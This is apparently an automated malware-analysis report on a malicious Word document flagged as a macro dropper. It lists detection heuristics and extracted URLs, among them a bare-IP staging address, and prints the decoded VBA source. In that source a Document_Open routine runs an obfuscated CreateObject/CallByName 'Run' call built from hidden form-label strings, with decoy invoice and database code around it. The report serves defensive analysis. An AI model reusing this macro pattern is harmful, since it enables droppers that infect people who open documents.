MALICIOUS
290
Risk Score
Heuristics 9
-
ClamAV: Doc.Dropper.Agent-6937918-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6937918-0
-
Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGERRaw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set DOBIBOR = CreateObject("" + WINDOWS5.Label2.Tag & "") -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName DOBIBOR, "R" + "un", VbMethod, WINDOWS5.Label55.Tag & Chr(32) + " ACX=CHR(10) " & WINDOWS5.Tag + " " & " DGH=CHR(13) ", 0, False -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://79.141.171.160/alg In document text (OLE body)
- http://ocsp.sectigo.com0In document text (OLE body)
- http://ocsp.usertrust.com0In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- https://sectigo.com/CPS0CIn document text (OLE body)
- http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sIn document text (OLE body)
- http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#In document text (OLE body)
- http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0vIn document text (OLE body)
- http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas🔏 SignedVBA project digital signature |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10241 bytes |
SHA-256: 050e090a832298e844fe9272ffb40cf31d5abafbd8fec87840e280be4e3cdd05 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function getQuestionId() As Integer
getQues.tionValue "id"
End Function
Public Function getQuestionId2() As Integer
getQuest.ionValue "id"
End Function
Sub Document_Open()
Dim currentPi0 As Object
Dim currentPi7 As Object
Dim currentPi11 As Object
Dim currentPi12 As Object
Dim c As New Class1
c.PowerOn
Dim currentPi5 As Object
Dim currentPi6 As Object
Dim currentPi9 As Object
ActiveDocument.Close False
getQuestionId
Application.Quit False
End Sub
Public Sub fill(dgv)
Dim adapter
Dim dataset
connection.Open
adapter = SqlData.adapter(command)
dataset = dataset
adapter.fill (dataset)
If dataset.Tables.Count > 0 Then
dgv.Refresh
dgv.DataSource = dataset.Tables(0)
End If
MsgBox (ex.Message)
Thr.ow ex
If connection.State = ConnectionState.Open Then
connection.Close
End If
End Sub
Sub LoadQuestions()
db.fill (dgvQuestions)
End Sub
Sub LoadToolStripMenuItem_Click(sender, e)
Hand.les LoadToolStripMenuItem.Click
LoadQuestions
End Sub
Sub printenrolleedepentall()
Try
Dim connection As SqlConnection
Dim command As SqlCommand
Dim adapter
Dim dataset
s_sqlcmd1 = "SELECT code1, company, address, address2, tel, Web, email FROM companytab"
s_sqlcmd2 = "SELECT enrolleeid, Surname, Firstname, othernames, dregister, sdate, edate, active, nationalid,NHIS, ogaid, hcpid, hcpname, ugstodate,sectortype FROM enrolleetab where Active = '" & False & "'"
connection = SqlConnection(My.Settings.cnnstring)
connection.Open
' load the table with headers into the dataset
command = SqlCommand(s_sqlcmd1, connection)
adapter.SelectCommand = command
adapter.fill dataset, "companytab" ' tablename *MUST* match with the tablename used in the report
' load the 2nd table into the dataset (lines)
adapter.SelectCommand.CommandText = s_sqlcmd2
adapter.fill dataset, "enrolleetab"
' define the relation between the tables
' dataset.Relations.Add("relation", dataset.Tables("bill_headers").Columns("billnr"), dataset.Tables("bill_lines").Columns("parent_billnr"))
' dataset is ready, get rid of the objects used to construct it
adapter.Dispose
command.Dispose
connection.Close
' Load the defined report with the dataset we just created
Dim myreport As ReportDocument
myreport = New ReportDocument
myreport.Load (My.Settings.Rptpath & "\" & "Enrodep3.rpt")
myreport.SetDataSource (dataset)
' bind viewer
' CrystalReportViewer1.DisplayGroupTree = False
CrystalReportViewer1.ReportSource = myreport
CrystalReportViewer1.RefreshReport
CrystalReportViewer1.Show
CrystalReportViewer1.Refresh
MessageBox.Show (Excep.Message)
End Sub
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub PowerOn()
Application.Run WINDOWS5.Label3.Tag
End Sub
Function VerifySysInt(ByVal si As Byte) As Boolean
Dim s As Integer
Dim i As Integer
s = 0
For i = 0 To 254 '&HFB
s = (s And &HFF) + si(i)
Next
s = s And &HFF
If s = si(255) Then
VerifySysInt = True
Else
VerifySysInt = False
End If
End Function
Attribute VB_Name = "Module1"
Function MakeLong(ByVal extb, ByVal offset As Integer, ByVal sz As Integer) As Double
Dim i As Integer
Dim l As Double
Dim neg As Double
On Error Resume Next
MakeLong = 0
If sz = 3 Then
If extb(offset) >= 128 Then
extb(offset) = 128
neg = -1#
End If
MakeLong = ((extb(offset) * (256 ^ 2)) + (extb(offset + 2) * (256 ^ 1)) + extb(offset + 1)) * neg
End If
If sz = 4 Then
MakeLong = (extb(offset + 1) * (256 ^ 3) + extb(offset) * (256 ^ 2)) + (extb(offset + 3) * (256 ^ 1)) + extb(offset + 2)
End If
'For i = 0 To sz - 1
' l = extb(sz - 1 - i + offset)
' MakeLong = MakeLong + l * (256 ^ (i))
'Next
End Function
Public Sub PriceCount()
Dim PathTo1 As String
Dim DOBIBOR As Object
Dim eighteen101 As Object
Dim eighteen103 As Object
Dim eighteen109 As Object
Dim eighteen10 As Object
Set DOBIBOR = CreateObject("" + WINDOWS5.Label2.Tag & "")
Dim eighteen105 As Object
Dim eighteen106 As Object
Dim eighteen100 As Object
Dim eighteen107 As Object
On Error Resume Next
Dim eighteen1011 As Object
Dim eighteen1012 As Object
Dim eighteen104 As Object
Dim eighteen1034 As Object
Dim eighteen108 As Object
CallByName DOBIBOR, "R" + "un", VbMethod, WINDOWS5.Label55.Tag & Chr(32) + " ACX=CHR(10) " & WINDOWS5.Tag + " " & " DGH=CHR(13) ", 0, False
End Sub
Sub Prininvoice()
' MessageBox.Show(rptrangecode)
Try
Dim MyCommand As New SqlCommand
Dim myDA As New SqlDataAdapter
Dim myDS As New reportdata2 'The DataSet you created.
Dim cryRpt As New ReportDocument
cryRpt.Load (My.Settings.Rptpath & "\" & "invoicereport.rpt")
MyCommand.connection = myConnection2 'AND OP1 = '" & "F7" & "' "
MyCommand.CommandText = "select * from(select a.billcode,a.descr,a.invoicetopic,a.tdate,a.invoiceno,a.glcode,a.Amtword,a.salesrep,a.stax,a.itotal,a.netdue,a.addressto,a.signby,b.pcode,b.eqty,b.uprice,b.tax,b.discount,b.amt,c.company,c.address,c.address2,c.tel,a.accountname,a.accountno,a.bankname,a.branch,a.sortno from salesinvoicerpt a, sinvoicegridrpt b,companytab c Where rtrim(a.invoiceno) = rtrim(b.invoiceno) and rtrim(a.invoiceno) = '" & RTrim(rptrangecode) & "')school"
MyCommand.CommandType = CommandType.Text
myDA.SelectCommand = MyCommand
myDA.fill myDS, "school"
cryRpt.SetDataSource (myDS)
CrystalReportViewer1.ReportSource = cryRpt
CrystalReportViewer1.RefreshReport
CrystalReportViewer1.Show
CrystalReportViewer1.Refresh
'Try
'Dim cryRpt As New ReportDocument
'cryRpt.Load(My.Settings.Rptpath & "\" & "invoicereport.rpt")
'CrystalReportViewer1.ReportSource = cryRpt
'CrystalReportViewer1.Refresh()
'Catch ex As Exception
' MDIParent1.statusmsg.Text = ex.Message
'End Try
Catch
MessageBox.Show (Excep.Message)
End
End Sub
Sub printenrolleedepentsector()
Try
Dim connection As SqlConnection
Dim command As SqlCommand
Dim adapter As New SqlDataAdapter
Dim dataset As New dataset
s_sqlcmd1 = "SELECT code1, company, address, address2, tel, Web, email FROM companytab"
s_sqlcmd2 = "SELECT enrolleeid, Surname, Firstname, othernames, dregister, sdate, edate, active, nationalid,NHIS, ogaid, hcpid, hcpname, ugstodate,sectortype FROM enrolleetab where Active = '" & False & "' and sectortype = '" & rptrangecode & "'"
connection = SqlConnection(My.Settings.cnnstring)
connection.Open
' load the table with headers into the dataset
command = SqlCommand(s_sqlcmd1, connection)
adapter.SelectCommand = command
adapter.fill dataset, "companytab" ' tablename *MUST* match with the tablename used in the report
' load the 2nd table into the dataset (lines)
adapter.SelectCommand.CommandText = s_sqlcmd2
adapter.fill dataset, "enrolleetab"
' define the relation between the tables
' dataset.Relations.Add("relation", dataset.Tables("bill_headers").Columns("billnr"), dataset.Tables("bill_lines").Columns("parent_billnr"))
' dataset is ready, get rid of the objects used to construct it
adapter.Dispose
command.Dispose
connection.Close
' Load the defined report with the dataset we just created
Dim myreport As ReportDocument
myreport = New ReportDocument
myreport.Load (My.Settings.Rptpath & "\" & "Enrodep3.rpt")
myreport.SetDataSource (dataset)
' bind viewer
' CrystalReportViewer1.DisplayGroupTree = False
CrystalReportViewer1.ReportSource = myreport
CrystalReportViewer1.RefreshReport
CrystalReportViewer1.Show
CrystalReportViewer1.Refresh
MessageBox.Show (Excep.Message)
End Sub
Attribute VB_Name = "WINDOWS5"
Attribute VB_Base = "0{2685ADE8-8692-49B9-8CE5-EFC8D03F2070}{780488BF-578B-4551-9E02-FFF5D3D52865}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module2"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.